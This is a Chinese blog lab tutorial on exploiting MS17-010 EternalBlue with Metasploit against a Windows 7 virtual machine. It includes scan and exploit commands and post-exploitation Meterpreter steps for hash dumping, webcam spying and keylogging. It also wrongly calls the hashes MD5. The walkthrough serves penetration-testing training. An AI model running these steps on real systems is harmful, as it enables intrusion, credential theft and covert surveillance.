★关于道德伦理的忠告★

以下内容摘自《Metasploit渗透测试指南》

作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:

  • 不要进行恶意的攻击;

  • 不要做傻事;

  • 在没有获得书面授权时,不要攻击任何目标;

  • 考虑你的行为将会带来的后果;

  • 如果你干了些非法的事情,天网恢恢疏而不漏,你总会被抓到牢里的。

1、实验说明

1.1. 漏洞原理

MS17-010(永恒之蓝)是win 7 系统的漏洞,仅影响windows系统中的SMBv1服务。该漏洞是由于SMBv1内核函数中的缓冲区溢出导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。通过445文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件。可以使用Metasploit和其他渗透测试框架进行利用和测试。

该漏洞易受攻击,且已经公开和广泛利用,建议windows及时进行安全更新 ,避免被攻击。

1.2. 前提条件

攻击者与被攻击者的必须互相ping通,才能开始攻击。使用VMware作为实验环境时,确保同一网段。

1.3. 实验环境

VMware 版本是17

kali-linux系统,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4

win7系统,IP:192.168.242.6

VMware 安装比较简单,从官网下载安装包后,根据安装引导基本点下一步即可。kali和win7系统如果没有,在文末有获取方式,用VMware打开到kali和win7系统目录下,会看到文件后缀是.vmx直接打开即可,会提示虚拟机已经移动相关的提示,选择复制的那个选项打开。网络适配器选择NAT模式,IP不需要手动设置。

2、实验流程

2.1. 确定可ping通

确定目标win7系统,与kali同一个局域网的主机,kali可ping通win7系统的ip

# ping 请求2次
ping 192.168.242.6 -c 2

# ping 结果是通的,可进行后续操作
PING 192.168.242.6 (192.168.242.6) 56(84) bytes of data.
64 bytes from 192.168.242.6: icmp_seq=1 ttl=128 time=0.607 ms
64 bytes from 192.168.242.6: icmp_seq=2 ttl=128 time=0.428 ms

2.2. 扫描存活IP和端口开放

nmap扫描,nmap -T4 -A -v -Pn 192.168.242.0/24进行全面扫描,扫描网段存活IP,以及端口开放情况

nmap 命令是kali系统自带的命令,不用再额外安装。

扫描结果如下,发现445端口开放着

2.3. MSF终端渗透攻击

进入msfconsole终端,search ms17-010,查找ms17-010渗透攻击模块,进行模糊匹配,探测主机是否存在漏洞,利用use命令选择测试接口exploit/windows/smb/ms17_010_eternalblue,可探查主机是否存在永恒之蓝漏洞,其中 show options是查看要配置的参数情况。

注意:由于kali默认登录的kali账户需要切换管理员权限

# 切换管理员权限,需要输入密码
sudo su

# 输入正确密码后,切换成功
┌──(root💀kali)-[/home/kali]
└─# 

# 进入msfconsole终端
msfconsole

# 当看到 msf6 >  就表示模块加载成功了,输入
msf6 > search ms17-010

# 查到相关模块,使用的是exploit/windows/smb/ms17_010_eternalblue,索引号是0
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

# 使用模块0
msf6 > use 0

# 可用使用 show options 查看参数,和载荷,会发现参数其实只要设置一个RHOSTS目标主机ip就可以了,载荷有默认值可以不用设置
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# 设置RHOSTS目标主机ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.242.6

# 开始攻击
run

# 攻击成功,会看到WIN,然后出现meterpreter >

2.4. 后渗透利用

进入meterpreter之后,表示渗透成功,可以执行一些深入利用的操作,可以执行一些后渗透命令:

screenshot //桌面截图
getuid   //查看权限
抓取密码:hashdump   //抓取加密之后的密码
	加密方式:MD5  在线解密网站:https://www.cmd5.com/
拍照:
webcam_list    //查看摄像头
webcam_snap   //通过摄像头拍照
webcam_stream   //通过摄像头开启视频
键盘监听:
ps   //查看windows系统运行进程
migrate -P 进程的PID
keyscan_start  //开始监听
keyscan_dump  //获取监听
keyscan_stop //停止监听
shell  //进入的就是DOS系统  受害者win7的cmd命令行
chcp 65001 //改变编码方式,改乱码
whoami  //查看受害者当前用户及权限
windows系统最高权限:system(系统权限)
从命令行退回meterpreter:exit

2.4.1.命令测试截图

#查看权限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

# 桌面截图 截图成功保存到kali系统的当前目录下
meterpreter > screenshot
Screenshot saved to: /home/kali/nOPlvAsc.jpeg

# 上传文件 到win7系统,注意目录必须是存在的,否则会上传失败
upload /home/kali/1.jpeg C:\\2.jpeg

# 拍照
# 查看摄像头 , 显示1: Integrated Camera 表示,摄像头可用
meterpreter > webcam_list
1: Integrated Camera 

# 通过摄像头拍照
meterpreter > webcam_snap

# 摄像成功输出结果示例 
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /home/kali/XgjiynAu.jpeg
meterpreter > Running Firefox as root in a regular user's session is not supported.  ($XAUTHORITY is /home/kali/.Xauthority which is owned by kali.)

# 此时需要自己再按enter键继续下一步

2.4.2.拍照功能注意说明

拍照功能需要虚拟机win7系统,右下角的照相机要设置连接如图:

如果是使用我提供的win7系统虚拟机,需要再把一个小工具(MediaCreationTool22H2-win7照相功能.exe)复制到win7双击执行一下,才可实现拍照功能。

3、资料获取

如果需要kali和win7系统虚拟机,进行渗透测试的话,请关注我的公众号:大象只为你,后台回复:虚拟机。文件有些大下载耗时会比较久。

posted on 2023-09-26 00:52  大象只为你  阅读(1119)  评论(0编辑  收藏  举报